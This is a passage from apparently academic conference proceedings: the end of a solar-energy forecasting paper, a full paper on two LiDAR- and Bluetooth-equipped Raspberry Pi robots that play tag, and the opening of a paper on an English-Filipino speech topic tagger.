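On this scale both networks are off by roughly two percent of the LMP range, and the gap between them is small. Since the range is only approximate, these percentages are indicative rather than exact.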
5 Conclusion and Future Work
Overall, this research effort analyzed the importance of key parameters in predicting solar energy production. Real-time data was used, and the prediction accuracy of the different machine learning models was compared. The single computational framework developed in this research can be used to make real-time forecasts of solar energy production. This will enable utility companies and enthusiasts in the renewable energy sector to make informed decisions about the administration, utilization, and maintenance of energy sources, thereby reducing the underlying challenges. One of the main future goals is to improve the quality of the AI algorithms through model tuning. This might include applying several methods and time scales, such as averaging results from the same day across several years. Using different time intervals produces a variety of possible combinations of acceptable times. It also has a significant translational element, informing local residents of what to anticipate at a given season of the year. Establishing a strong correlation between the temperature, humidity, or wind speed and the LMP could lead to faster discovery and learning mechanisms. Improving this research has great potential to show how sustainable and affordable improvements can be made effectively and quickly, to the benefit of the company and its customers.
References
1. Chen, C., Duan, S., Cai, T., Liu, B.: Online 24-h solar power forecasting based on weather type classification using artificial neural network. Solar Energy 85(11), 2856–2870 (2011). ISSN 0038-092X, https://doi.org/10.1016/j.solener.2011.08.027
2. Li, B., Delpha, C., Diallo, D., Migan-Dubois, A.: Application of artificial neural networks to photovoltaic fault detection and diagnosis: a review. Renew. Sustain. Energy Rev. 138, 110512 (2021). ISSN 1364-0321, https://doi.org/10.1016/j.rser.2020.110512
3. Rehman, S., Mohandes, M.: Artificial neural network estimation of global solar radiation using air temperature and relative humidity. Energy Policy 36(2), 571–576 (2008). ISSN 0301-4215, https://doi.org/10.1016/j.enpol.2007.09.033
4. Jebli, I., Belouadha, F.-Z., Kabbaj, M.I., Tilioua, A.: Prediction of solar energy guided by Pearson correlation using machine learning. Energy 224, 120109 (2021). ISSN 0360-5442, https://doi.org/10.1016/j.energy.2021.120109
5. Rodríguez, F., Fleetwood, A., Galarza, A., Fontán, L.: Predicting solar energy generation through artificial neural networks using weather forecasts for microgrid control. Renew. Energy 126, 855–864 (2018). ISSN 0960-1481, https://doi.org/10.1016/j.renene.2018.03.070
6. Khatib, T., Mohamed, A., Sopian, K.: A review of solar energy modeling techniques. Renew. Sustain. Energy Rev. 16(5), 2864–2869 (2012). ISSN 1364-0321, https://doi.org/10.1016/j.rser.2012.01.064
7. Perveen, G., Rizwan, M., Goel, N., Anand, P.: Artificial neural network models for global solar energy and photovoltaic power forecasting over India. Energy Sources Part A: Recovery Utilization Environmental Effects (2020). https://doi.org/10.1080/15567036.2020.1826017
8. Yesilbudak, M., Colak, M., Bayindir, R.: A review of data mining and solar power prediction, pp. 1117–1121 (2016). https://doi.org/10.1109/ICRERA.2016.7884507
9. Lee, W., Kim, K., Park, J., Kim, J., Kim, Y.: Forecasting solar power using long-short term memory and convolutional neural networks. IEEE Access 6, 73068–73080 (2018). https://doi.org/10.1109/ACCESS.2018.2883330
10. Kazem, H.A.: Prediction of grid-connected photovoltaic performance using artificial neural networks and experimental dataset considering environmental variation. Environ. Dev. Sustain. (2022). https://doi.org/10.1007/s10668-022-02174-0
11. Yadav, H.K., Pal, Y., Tripathi, M.M.: Photovoltaic power forecasting methods in smart power grid. In: 2015 Annual IEEE India Conference (INDICON), pp. 1–6 (2015). https://doi.org/10.1109/INDICON.2015.7443522
12. Durrani, S.P., Balluff, S., Wurzer, L., Krauter, S.: Photovoltaic yield prediction using an irradiance forecast model based on multiple neural networks. J. Mod. Power Syst. Clean Energy 6(2), 255–267 (2018). https://doi.org/10.1007/s40565-018-0393-5
13. Watetakaran, S., Premrudeepreechacharn, S.: Forecasting of solar irradiance for solar power plants by artificial neural network. In: Proceedings of IEEE Innovative Smart Grid Technologies-Asia (ISGT-Asia), Bangkok, Thailand, 3–6 November 2015, pp. 1–5 (2015)
14. Wang, J., Zhao, B., Yao, X.: PV abnormal shading detection based on convolutional neural network. In: 2020 Chinese Control and Decision Conference (CCDC), pp. 1580–1583 (2020). https://doi.org/10.1109/CCDC49329.2020.9164630
15. Paiva, G., Pimentel, S.P.: Multiple site intraday solar irradiance forecasting by machine learning algorithms: MGGP and MLP neural networks. Energies 13(11), 3005 (2020). https://doi.org/10.3390/en13113005
16. Penn, D., Subburaj, V.H., Subburaj, A.S., Harral, M.: A predictive tool for grid data analysis using machine learning algorithms. In: 2020 10th Annual Computing and Communication Workshop and Conference (CCWC), pp. 1071–1077. IEEE, January 2020
Implementation of a Tag Playing Robot for Entertainment
Mustafa Ayad, Jessica MacKay, and Tyrone Clarke
State University of New York, Oswego, NY 13126, USA
[email protected]
Abstract. Although robots have been around for a while, they continue to charm and attract people. This attraction has led to increasingly numerous applications of robotics in entertainment, such as crowd attractions, schools, amusement parks, and individuals’ homes. In this paper, two self-sufficient robots are designed, implemented, and controlled to play a game of tag. The two autonomous, identical robots are placed in a bounded space, the playing field. The objective is for one robot, playing the part of “It”, to find, identify, and tag the second robot. Tagging an object activates a Bluetooth pairing protocol, through which the “It” robot confirms that the other robot is a team member. After confirmation, the two robots switch roles and begin the game again. Authentication is performed through the Bluetooth protocol, while the LiDAR (Light Detection and Ranging) sensor determines the direction of the other robot. The robots were implemented and tested in different scenarios; they could identify each other on the playing field and switch roles successfully.

Keywords: TagBot · LiDAR · Bluetooth
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 416–426, 2023. https://doi.org/10.1007/978-3-031-28073-3_30

1 Introduction

Entertainment is one of the essential applications of autonomous robots. However, the reliability and safety requirements for these robots are less severe than for other applications, such as industrial robots [1]. Nowadays, technology provides tools that let children add computational components to traditional toy structures and recognize and learn the concepts behind different activities [2]. Entertainment robots are used in various applications. For example, they can serve as interactive marketing tools at commerce exhibitions [3]. As promotional robots move about an exhibition floor, they actively interact with attendees and draw them to specific company booths [4]. In this paper, we focus on one game played by most kids worldwide, the tag game, as in Fig. 1. The game is designed and implemented using two mini robots, each with a LiDAR sensor and a Bluetooth module for the handshake process [5].

Playing tag has always been an engaging, fun, and evolving game. It is found universally in playgrounds and parks, and it has reached the point of becoming a highly competitive sport, World Chase Tag, which is starting to spread worldwide. The idea of focusing on tag-playing robots at a smaller scale was brought to our attention. We were surprised to find little published information on this topic, which complicated our design process. Through creativity and critical thinking, we established a method by which robots can play tag. The robots, however, need specific tools to perform the simple tasks involved.

Robotics has been used and developed consistently over the past years. The purpose of many robots is to limit human error, and, depending on the task, a robot usually gives a more accurate result. In this paper, we focus on the use of robotics in entertainment. Constructing robots that play a form of tag shows how technology has changed its course. These TagBots are a fun and creative way to give human games a more competitive nature. The robots must perform the following functions:
• Move freely in the required space
• Detect when there is another player in the game
• Transfer information between two or more players
• Avoid obstacles in their way
Fig. 1. Two TagBots on the playing field.
Beyond these expectations for the TagBots, communication plays a significant role in this type of game. Our approach depends heavily on LiDAR, which is widely used in robot development. Communication is encouraged in most robotic designs because it mirrors one of the most common human traits. Unless programmed to expect specific scenarios, robots are blind objects with no sense of direction and no understanding of what is happening around them. In demanding cases such as swarm robotics, the ideal purpose is to understand where the other robots are coming from. Because fully understanding robot-to-robot communication at a larger scale was not feasible here, we use an alternative solution: the Bluetooth embedded in the Raspberry Pi serves as the essential form of communication and shapes the implementation of this project.

This paper aims to introduce a form of entertainment to society: games that can be played with robots all over the globe in different social settings. The problem we address belongs to the field of entertainment. Many games are focused on platforms such as Xbox, PC, and PS4, but this work has the potential to steer people toward a greater interest in robotics. Much of the wonder comes from building something of your own and programming it to do multiple tasks simultaneously. Many factors go into making this, but it will allow people to see the bigger gaming picture.

The paper is organized as follows. Section 2 presents related work. Section 3 presents the tag robot design and implementation. Section 4 presents the hardware components used in the design. Section 5 presents the discussion and results. Finally, Sect. 6 concludes the paper.
2 Related Work

Several methods exist for designing and programming a robot to approach or move toward another robot. A robot can also be programmed to follow a person or an object. Among these applications is the Follow Me technique, in which the robot follows a moving object such as a walking person [5]. In this scenario, the robot observes the target object’s position using various types of sensors, such as laser range finders (LRF) [6], cameras [7], or RGB-D sensors [8]. The robot can then move toward the target and approach it while avoiding obstacles in its way. The choice of sensor depends on the application and the available computation power. For example, object recognition using a 2D LRF requires less computation than recognition from a depth image using cameras [9], which is advantageous in applications where the object moves quickly. Moreover, an LRF has two crucial advantages: it is robust against changes in illumination, and its range [10] is greater than that of an RGB-D sensor [11]. Most robots that play with humans do not make direct contact with other players. However, several works have designed robots that physically touch humans or other playing robots [12]. In our design, both robots move slowly, which makes the touch behavior easier to realize, and we use LiDAR and the Bluetooth protocol for tracking and authentication.
3 Design and Implementation

There are many possible routes to this goal; the one we found most effective starts with the initial circuitry of the robots. For the robots to play the form of tag established earlier, they must follow these steps. First, the robots are linked via Bluetooth to allow communication between them. Each robot has both the “running” code and the “chasing” (It-bot) code loaded, as well as a method for switching between them. The robots are based on SparkFun RedBot kits, using a Raspberry Pi board and additional components as necessary, as in Fig. 2. Both robots use LiDAR to detect objects and position themselves in the room. The It-bot also uses it to ascertain the direction of the running robot and set its course accordingly. The running bot travels randomly around the available space. Both robots are equipped with bump sensors on all faces. When a bump sensor is triggered, the robot initiates or waits for a handshake. If there is no handshake, the robot continues on its way. If there is a handshake, the robots switch roles: the new running bot takes off immediately in a randomly determined direction, and the new It-bot waits for a predetermined amount of time before setting off in pursuit. The robots stay inside a bounded area by using line sensors to detect when they are about to move “out of bounds” and adjusting their direction accordingly.

The software was written in Python 3 and uses several available libraries: PiGPIO handles the GPIO tasks, PyBluez handles Bluetooth, and the rplidar library drives the Slamtec RPLiDAR. An individual driver was written for each component and imported into other code, which allowed us to test each piece individually and build progressively more complicated behaviors. Keeping the pin information and functions such as “stop,” “go,” and “connect” in self-contained files made it simple to access component functionality while keeping the main block of code simple and elegant. In addition, when I/O pins were reassigned, only a single file had to change for all test programs to keep working. Drivers were written for the motors, bumpers, line sensor, Bluetooth, and LED strip light.
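The role-switching behavior described in this section can be summarized as a small state machine. The following is a minimal sketch under stated assumptions, not the authors’ code: the names `Role`, `TagBot`, `on_bump`, and the injected `handshake` callback are hypothetical, and the default wait of 5 s is an assumed value, since the text only specifies “a predetermined amount of time”.

```python
from enum import Enum


class Role(Enum):
    IT = "it"          # the chasing robot
    RUNNER = "runner"  # the robot being chased


class TagBot:
    """Hypothetical role logic for one robot; hardware access is injected."""

    def __init__(self, role, handshake, wait_seconds=5.0):
        self.role = role
        # handshake() stands in for the Bluetooth exchange. It returns True
        # only when the bumped object is confirmed to be the other player.
        self.handshake = handshake
        self.wait_seconds = wait_seconds  # assumed delay before a new It-bot chases
        self.pending_wait = 0.0

    def on_bump(self):
        """Called when any bump sensor is triggered; returns True on a role switch."""
        if not self.handshake():
            # A wall or a stray object: keep the current role and carry on.
            return False
        if self.role is Role.IT:
            # The old It-bot becomes the runner and leaves immediately.
            self.role = Role.RUNNER
            self.pending_wait = 0.0
        else:
            # The old runner becomes It and waits before pursuing.
            self.role = Role.IT
            self.pending_wait = self.wait_seconds
        return True
```

Injecting the handshake as a callback keeps the role logic testable without Bluetooth hardware, in the same spirit as the per-component drivers described above.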
Fig. 2. TagBot Body and Parts
4 Design Hardware Components

The components used to reach our goal most efficiently are presented below. Each is shown with an image and a brief description of its general purpose and of how it is used in the implementation.

LiDAR (Light Detection and Ranging) uses ranged laser pulses to map the environment, as in Fig. 3. The A1M8 is a 360° 2D system that provides a rough silhouette of the area out to 12 m. The LiDAR is used to initially identify an object inside the play area and set a heading to come into contact with it. The rplidar Python library was used to control the LiDAR. Functions in the library return either complete scans or individual measurements; for our purposes, we used only individual measurements. Each measurement is returned from the LiDAR as a list consisting of scan quality, angle, and distance, where quality is related to the amount of reflected light returned to the sensor. Angle and distance were the two values that concerned us most. We used quality only to discard potentially unreliable measurements, namely those whose quality came back as 0. Because of the placement of the holes on the chassis, the LiDAR could not be mounted facing straight ahead. To find the angular offset, objects were placed at the front, left, back, and right sides of the robot, and the resulting angle measurements were used to define our “North”, “South”, “East”, and “West”. These angles were 6.8712°, 185.250°, 98°, and 276.1156°, respectively. With these angles established, readings were grouped into headings of approximately 45°, and timed motor runs were used to adjust the robot’s direction.

Fig. 3. Slamtec RPLiDAR A1M8

Figure 4 shows the line sensor. VEX line sensors tell the robot when it is over a very dark surface, such as the black electrical tape used around the playing surface. The sensor shines light onto the surface and judges its darkness from the amount of light reflected back. The reading is then used to decide the robot’s next movements. In our setup, the tape forms a barrier surrounding the area in which the robots play.

Figure 5 depicts the processor of the assembled robot. The Raspberry Pi 3 B+ is one of the latest Raspberry Pi boards available. It provides a 64-bit quad-core processor, integrated Bluetooth, 26 general-purpose I/O pins, dedicated I2C pins, and dedicated 3.3 V and 5 V power and ground pins. The integrated Bluetooth was used as the final confirmation. On being tagged, the NotIt robot opens a Bluetooth server connection and waits for the It robot to connect. Once the connection is established, the two robots exchange unique identifications, check the identification against a list of playing robots, confirm with each other, and then change roles.
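Returning to the LiDAR readings described earlier in this section, the offset correction and the grouping into 45° headings can be illustrated with a short sketch. This is an illustration under assumptions rather than the authors’ driver: the function names are hypothetical, measurements are taken to be plain `(quality, angle, distance)` tuples, distances are assumed to be in millimetres, and choosing the closest valid reading as the target is an assumed policy. Only the “North” angle and the rule of discarding quality-0 readings come from the text.

```python
# Raw LiDAR angle (degrees) observed for an object directly in front of the
# robot, i.e. the "North" reading reported in the text.
FRONT_OFFSET_DEG = 6.8712

# Eight compass-style sectors, each roughly 45 degrees wide.
SECTORS = ["N", "NE", "E", "SE", "S", "SW", "W", "NW"]


def to_robot_frame(raw_angle_deg, offset_deg=FRONT_OFFSET_DEG):
    """Rotate a raw LiDAR angle so that 0 degrees means straight ahead."""
    return (raw_angle_deg - offset_deg) % 360.0


def sector_of(raw_angle_deg):
    """Map a raw angle to the nearest 45-degree heading."""
    relative = to_robot_frame(raw_angle_deg)
    index = int((relative + 22.5) // 45) % 8
    return SECTORS[index]


def nearest_target(measurements, max_distance_mm=12000):
    """Pick the closest valid reading from (quality, angle, distance) tuples.

    Readings with quality 0 are discarded, as in the text. The 12 m limit
    matches the stated range of the sensor.
    """
    valid = [m for m in measurements if m[0] > 0 and 0 < m[2] <= max_distance_mm]
    if not valid:
        return None
    _quality, angle, distance = min(valid, key=lambda m: m[2])
    return sector_of(angle), distance
```

With the four calibration angles from the text, `sector_of` returns “N”, “S”, “E”, and “W” for 6.8712°, 185.250°, 98°, and 276.1156°, which is a quick consistency check on the single-offset assumption.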
Fig. 4. Line sensor
Fig. 5. Raspberry Pi 3 B+
In the scope of this paper, with just two robots, this was accomplished by hard coding the MAC addresses of each Pi into the Bluetooth code as “myAddress” and “yourAddress”. Since the MAC address should be unique to any device attempting to connect, this eliminates the possibility of someone’s phone connecting and accidentally triggering the robot to switch roles, for example.
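The identification check described above can be sketched as a simple allowlist lookup. This is a hedged illustration only: the addresses are placeholders, the constants mirror the “myAddress” and “yourAddress” names from the text, and the helper functions are hypothetical rather than taken from the authors’ Bluetooth driver.

```python
# Placeholder addresses; the real values would be the two Pis' Bluetooth MACs.
MY_ADDRESS = "AA:BB:CC:00:00:01"
YOUR_ADDRESS = "AA:BB:CC:00:00:02"

# The list of playing robots that a connecting device is checked against.
PLAYING_ROBOTS = {MY_ADDRESS, YOUR_ADDRESS}


def normalize(address):
    """Upper-case and trim an address so comparisons are format-insensitive."""
    return address.strip().upper()


def is_player(peer_address, players=PLAYING_ROBOTS):
    """Return True only if the connecting device is a known playing robot."""
    return normalize(peer_address) in players


def should_switch_roles(peer_address, my_address=MY_ADDRESS):
    """A tag counts only if the peer is a listed robot other than ourselves."""
    peer = normalize(peer_address)
    return is_player(peer) and peer != normalize(my_address)
```

Keeping the player list in one set would also make it straightforward to register more robots later, which the conclusion names as future work.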
Fig. 6. Lynxmotion BMP-01 bumper switch assembly kit
We initially expected to need four bumpers (Fig. 6) to cover all faces of each robot. However, the chassis turned out to be so small that only three whiskers per robot were required.
The relay switches were attached to the top of the second layer of the chassis, with the whiskers curling around the robot in a circle. All three whiskers were routed through a series of OR gates to a single Raspberry Pi pin, so that activating any relay, or any combination of them, drives the pin high and triggers the necessary action. After being bumped, the robots stop their motors and ask for Bluetooth identification. The three-layer chassis kit was chosen to give us plenty of room for components while still resulting in a small, manageable robot, as in Fig. 7. The chassis ended up being smaller than expected, which called for creative use of space. We used extra standoffs to make each layer tall enough to hold parts on each side, and we ended up with a very tall, narrow robot. Because of that, and because the LiDAR made the robot top-heavy, we had to be very careful about motor speeds. Anything faster than about 40% usually resulted in the robot tipping over. However, to get the bumpers to register, we could not run the robots much below 35%, or they did not hit with enough force to press the button. This left us with a very narrow PWM range.
Fig. 7. SparkFun three-layer chassis kit
Fig. 8. Cytron MDD10A motor driver
Figure 8 shows the Cytron MDD10A motor driver board. It provides bi-directional control of two DC motors, at up to 30 V and 30 A for each channel. In addition, it supports both 3.3 V and 5 V logic levels and PWM at up to 20 kHz. The board was straightforward to set up and use. Each motor required two pins from the Raspberry Pi: one to control the direction and one for the PWM. We used the PiGPIO library to code the motor driver and provide functions to go forward, go backward, turn left and right, and stop.

Figure 9 shows a fully assembled TagBot. The LiDAR was attached to the very top layer of the chassis. Standoffs were used to raise it and make room for the communication cable and USB adapter board beneath it. This extra space was initially intended for the LED driver board but ended up holding the battery pack instead. The Raspberry Pi was attached to the underside of the top layer, above the perfboard that we had soldered to carry the bumper circuit and the connections for the peripherals. The PiWedge was connected to this board as well. The perfboard was held apart from the chassis by standoffs, and the relay switches for the bumpers were attached directly to the chassis between it and the perfboard. The underside of the second layer held the motor driver board. The motors and wheels were attached to the bottom layer, and between them was a second perfboard whose circuit received the analog input from the line sensor and routed it through the potentiometer and op-amp to the I/O pin connection on the PiWedge. Finally, the line sensor was attached at the bottom with a ¼” standoff, bringing it as close to the ground as possible. We used the existing holes in the chassis as much as possible, but where there was no hole in the place we needed one, posts were glued to the chassis instead.
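The motor control scheme mentioned above (one direction pin and one PWM pin per motor) and the narrow usable speed band reported earlier can be combined in a short sketch. It is an assumption-laden illustration, not the authors’ driver: the `Motor` class, `clamp_speed`, the pin numbers, and the choice that a high direction pin means “forward” are all hypothetical. The only pigpio calls assumed are `write` and `set_PWM_dutycycle`, and a recording stand-in (`FakePi`) replaces `pigpio.pi()` so the logic runs without hardware.

```python
MIN_SPEED = 0.35  # below this the bumpers did not register (per the text)
MAX_SPEED = 0.40  # above this the robot tended to tip over (per the text)


def clamp_speed(fraction):
    """Keep a requested speed inside the usable band reported in the text."""
    return max(MIN_SPEED, min(MAX_SPEED, fraction))


class Motor:
    """One motor channel: a direction pin plus a PWM pin."""

    def __init__(self, pi, dir_pin, pwm_pin):
        self.pi = pi            # pigpio.pi() on the robot, a fake in tests
        self.dir_pin = dir_pin
        self.pwm_pin = pwm_pin

    def drive(self, fraction, forward=True):
        """Set direction and duty cycle; returns the duty value that was used."""
        duty = round(clamp_speed(fraction) * 255)  # pigpio's default range is 0-255
        self.pi.write(self.dir_pin, 1 if forward else 0)  # polarity is an assumption
        self.pi.set_PWM_dutycycle(self.pwm_pin, duty)
        return duty

    def stop(self):
        self.pi.set_PWM_dutycycle(self.pwm_pin, 0)


class FakePi:
    """Records calls so the logic can be checked without hardware."""

    def __init__(self):
        self.calls = []

    def write(self, gpio, level):
        self.calls.append(("write", gpio, level))

    def set_PWM_dutycycle(self, gpio, duty):
        self.calls.append(("pwm", gpio, duty))
```

Clamping inside the driver means higher-level behaviors cannot accidentally request a speed that tips the robot over or fails to press a bumper.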
Fig. 9. Fully assembled tag bot
5 Discussion and Results

We faced multiple obstacles while designing the robot. First, we had to start from smaller side circuits before developing the full robot, which showed us how the setup would look. The major challenge, however, was the amount of power the robots needed. With the line sensor, bumper sensors, and motors running simultaneously, it was hard to maintain enough power with four AA batteries. Our solution was to switch the power supply to portable charger packs that provide enough voltage and current. Although the Raspberry Pi 3 B+ still occasionally shut down due to insufficient power, the packs were more convenient. Measurements with an oscilloscope showed us that driving the LEDs would not be possible with only the 5 V and 3.3 V outputs. Finally, threading in Python was an issue at first. We relied heavily on engineering design principles to make all the sensors work alongside Bluetooth to form a connection, and it took a series of trials and errors before the code ran continuously.

The most distinctive ability of the TagBots is switching roles over a Bluetooth connection. Once the “It” bot found the other robot, contact through the bumpers triggered that connection. First, we had to ensure that the bumpers were correctly set up on both robots; if not, the signals would not transfer. We then researched how to connect a Pi over Bluetooth and collected the required information from both robots. Using Python 3, we tested a short back-and-forth exchange between the robots. It went as follows: Client: “Hello”; Server: “Hello”; Client: “How are you?”; Server: “I’m doing well”; Client: “Bye”; Server: “Bye”. Once these messages were successfully exchanged between the client and the server, we knew that the Bluetooth connection worked. The proper channels then had to be implemented to carry out the role switch successfully.

Completing the robot’s design enhanced our knowledge of Python programming and of the Raspberry Pi. It was eye-opening how much the Raspberry Pi 3 B+ can do. When we started the project, we were beginners in Python, and we have since become proficient in it. We also gained knowledge of circuit development, from creating a circuit to establishing its structure. Troubleshooting was one of the leading skills learned through the group work: we learned how to pinpoint the area where a problem lies and focus on finding the solution. It accounted for almost 50% of what the project required. We acquired most of our information from discussions with professionals and from research. These are essential tools that we will need later in the electrical field.

We ran different experimental tests in a playing field with an area of 3 m², as shown in Fig. 10. In one scenario, the robots identified and chased one another to tag and hand off the “It” role. Once it tags an object, the “It” robot initiates the handshake. It then checks that the tagged robot is “playing” and switches roles. Next, the runner robot moves away while the other one waits. Finally, the “It” robot seeks the runner within the play area and tries to tag it. The identification process is completed using LiDAR object detection and Bluetooth signal confirmation.
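The client and server test exchange described in this section can be reproduced on a single machine. The sketch below is a stand-in under stated assumptions: it uses an ordinary local socket pair from the Python standard library in place of the Bluetooth link, assumes newline-terminated text messages, and uses hypothetical helper names. On the robots the same request and reply pattern would run over a Bluetooth socket instead.

```python
import socket
import threading

# (client message, server reply) pairs taken from the exchange in the text.
SCRIPT = [
    ("Hello", "Hello"),
    ("How are you?", "I'm doing well"),
    ("Bye", "Bye"),
]


def send_line(sock, text):
    """Send one newline-terminated message."""
    sock.sendall(text.encode("utf-8") + b"\n")


def recv_line(sock):
    """Read bytes until a newline arrives (or the peer closes the link)."""
    data = bytearray()
    while not data.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        data.extend(chunk)
    return data.decode("utf-8").rstrip("\n")


def run_server(sock, replies):
    """Wait for each client message, then answer with the scripted reply."""
    for reply in replies:
        recv_line(sock)
        send_line(sock, reply)


def exchange():
    """Run the scripted conversation and return the replies the client saw."""
    client_sock, server_sock = socket.socketpair()
    with client_sock, server_sock:
        server = threading.Thread(
            target=run_server, args=(server_sock, [r for _, r in SCRIPT])
        )
        server.start()
        answers = []
        for message, _ in SCRIPT:
            send_line(client_sock, message)
            answers.append(recv_line(client_sock))
        server.join()
    return answers
```

Running the server side in a thread mirrors the situation on the robots, where the tagged robot waits for a connection while the other initiates it.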
Fig. 10. Designed TagBots in the playing field
6 Conclusion

Playing tag reinforces spatial awareness, obstacle avoidance, team member identification, and dynamic role switching in children. These same skills can be vital to the success of a multi-robot system. We took this simple, universal game and applied the same concepts to robotics. Using a 360-degree, 2D LiDAR mounted on each robot, the robots can assess the play area and identify potential players. Secondary identification and role confirmation can be made through additional sensors. Final confirmation and role switching are initiated through Bluetooth pairing of the robots. The implementation and the experimental tests were successful and are promising for possible extensions and future work, such as adding more playing robots and placing different obstacles in the playing field. We also plan to add further games such as Marco Polo, Hide and Seek, Blob Tag, and Red Rover. Moreover, we plan to add robot vision through cameras and improve team member identification.
References

1. Pratticò, F.G., Lamberti, F.: Mixed-reality robotic games: design guidelines for effective entertainment with consumer robots. IEEE Consum. Electron. Mag. 10(1), 6–16 (2021)
2. Cosentino, S., Randria, E.I.S., Pellegrini, J., Lin, T., Sessa, S., Takanishi, A.: Group emotion recognition strategies for entertainment robots. In: 2018 IEEE/RSJ International Conference on Intelligent Robots and Systems (IROS), pp. 813–818 (2018)
3. Westlund, K., Jacqueline, M., et al.: Flat vs. expressive storytelling: young children’s learning and retention of a social robot’s narrative. Front. Hum. Neurosci. 11, 295 (2017)
4. Jochum, E., Millar, P., Nuñez, D.: Sequence and chance: design and control methods for entertainment robots. Robot. Auton. Syst. 87, 372–380 (2017)
5. Catapang, A.N., Ramos, M.: Obstacle detection using a 2D LIDAR system for an autonomous vehicle. In: 2016 6th IEEE International Conference on Control System, Computing and Engineering (ICCSCE), pp. 441–445 (2016)
6. Islam, M.J., Hong, J., Sattar, J.: Person-following by autonomous robots: a categorical overview. Int. J. Robot. Res. 38, 1581–1618 (2019)
7. Kim, J., Jeong, H., Lee, D.: Single 2D lidar-based follow-me of a mobile robot on hilly terrains. J. Mech. Sci. Technol. 34, 3845–3854 (2020)
8. Chen, B.X., Sahdev, R., Tsotsos, J.K.: Person following robot using selected online AdaBoosting with stereo camera. In: Proceedings of the 2017 14th Conference on Computer and Robot Vision (CRV), Edmonton, AB, Canada, pp. 48–55 (2017)
9. Do, M.Q., Lin, C.H.: Embedded human-following mobile-robot with an RGB-D camera. In: Proceedings of the 2015 14th IAPR International Conference on Machine Vision Applications (MVA), Tokyo, Japan, pp. 555–558 (2015)
10. Dekan, M., František, D., Andrej, B., Jozef, R., Dávid, R., Josip, M.: Moving obstacles detection based on laser range finder measurements. Int. J. Adv. Robot. Syst. 15(1), 1729881417748132 (2018)
11. Cooper, M.A., Raquet, J.F., Patton, R.: Range information characterization of the Hokuyo UST-20LX LIDAR sensor. Photonics 5(2), 12 (2018)
12. Corti, A., Giancola, S., Mainetti, G., Sala, R.: A metrological characterization of the Kinect V2 time-of-flight camera. Robot. Auton. Syst. 75, 584–594 (2016)
13. Kamezaki, M., Kobayashi, A., Yokoyama, Y., Yanagawa, H., Shrestha, M., Sugano, S.: A preliminary study of interactive navigation framework with situation-adaptive multimodal inducement: pass-by scenario. Int. J. Soc. Robot. 12, 567–588 (2019)
English-Filipino Speech Topic Tagger Using Automatic Speech Recognition Modeling and Topic Modeling
John Karl B. Tumpalan and Reginald Neil C. Recario
University of the Philippines, 4031 Los Baños, Philippines
{jbtumpalan,rcrecario}@up.edu.ph
Abstract. We present an English-Filipino Speech Topic Tagger that transcribes English-Filipino speech audio into text and produces relevant keywords from that audio. The tagger was implemented in two parts: speech data is first transcribed to text using an English XLSR-Wav2Vec2 Automatic Speech Recognition (ASR) model fine-tuned on Filipino, and context is then extracted from the transcription using Latent Dirichlet Allocation (LDA), a generative statistical model used for topic modeling. The trained English-Filipino ASR model shows a 26.8% Word Error Rate on the validation set. The Speech Topic Tagger was evaluated through an observation-based approach using different YouTube videos as input; its highest evaluation was 46.15% accuracy and its lowest was 14.28% accuracy in producing relevant top-weighted words.

Keywords: Automatic Speech Recognition · Topic modeling · Speech tagging · XLSR-Wav2Vec2 · Speech recognition for English-Filipino · Latent Dirichlet Allocation · Transfer learning · Audio and speech processing
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 427–445, 2023. https://doi.org/10.1007/978-3-031-28073-3_31

1 Introduction

Automatic Speech Recognition (ASR) allows a computer system to process speech audio and convert it into text. Earlier ASR solutions used Hidden Markov Model (HMM)-based toolkits for language and acoustic modeling. Recent solutions to the Detection and Classification of Acoustic Scenes and Events (DCASE) challenges are instead modeled using neural networks such as Deep Neural Networks (DNN), Recurrent Neural Networks (RNN), Convolutional Neural Networks (CNN), or a mixture of RNN and CNN.

Audio tagging, on the other hand, is the act of labeling audio recordings with one or more tags. The ability to label different sounds can be used in several applications, such as music recommendation [1], audio surveillance and alarms [2], animal monitoring systems [3], and content-based multimedia search. However, manual audio tagging is tedious for the tagger. Given the amount of audio data that must be tagged in some use cases, manual tagging is not a practical solution. Because of this, numerous studies have been conducted on automatic tagging of audio files using newer technologies. Since 2016, researchers have organized the annual DCASE challenge, which aims to reliably recognize sound scenes and individual sources in realistic soundscapes despite the presence of multiple sounds and noise.

This research study aimed to design and implement an English-Filipino Speech Tagger. Generally, the researchers aimed to create an application that can perform automatic speech topic tagging. Specifically, the researchers aimed to: (a) implement speech tagging in two parts, first transcribing speech data using the Speech-to-Text output of an ASR and then extracting context from the output using Topic Modeling; (b) implement modeling techniques to test the compatibility of such methods in an Automatic Speech Recognition system for English-Filipino; and (c) evaluate the results of Latent Dirichlet Allocation (LDA) in extracting topics from an English-Filipino audio data collection through transcriptions produced by an English-Filipino ASR model.

This study provides an avenue to address the research gap in ASR for Filipino or English-Filipino, given the wide array of applications that make use of speech recognition and the existing complexity of the Filipino language. Its significance extends to the use of speech-related technologies, models, and libraries in an application that recognizes this low-resource language. Additionally, the study sought to bridge the audio tagging use case through an ASR that can recognize English and Filipino, for Filipino-context use cases such as content-based tagging of Filipino speech data.

The study also introduced a two-part process of speech tagging in a bilingual context. While other papers used LSTM-based RNNs, or transfer-learned CNNs on Mel spectrogram representations of speech, for speech recognition tasks, this study used XLSR-Wav2Vec2, a multilingual version of Wav2Vec2 by Facebook AI, for its speech recognition part. The final model was trained on Filipino speech data with a high occurrence of code-switching, on top of a pre-trained English model.
2 Literature

Automatic Speech Recognition (ASR) is the technology that allows machines to recognize speech signals. These signals are converted into a sequence of words, phrases, or sentences using different models implemented in a device or computer. These linguistic entities can be used as commands for data entry or database access [4], or as triggers for machines to respond to the signals in a way that resembles human conversation [5]. An ASR system can thus allow voice to trigger machine commands for IoT devices. This use case is very useful because the user communicates with the machine through natural language rather than through an interface, which improves the accessibility of modern systems for less knowledgeable users. Many applications today require ASR to be computationally light, accurate, adaptable, and effective. This study explores ASR methods for meeting these requirements in Filipino-English speech, as most Filipinos use code-switching in everyday conversations and professional discussions.

However, the development of ASR is complex in nature. A typical ASR system architecture needs very meticulous pre-processing before feature extraction. The lexicon, language model, and acoustic model are needed to create a working decoder or speech recognizer. These models are distinct, require a unique speech and text corpus for every language, and face the challenges of variability, grammar, vocabulary, characteristics, speed of utterance, pronunciation, and environmental noise [6].

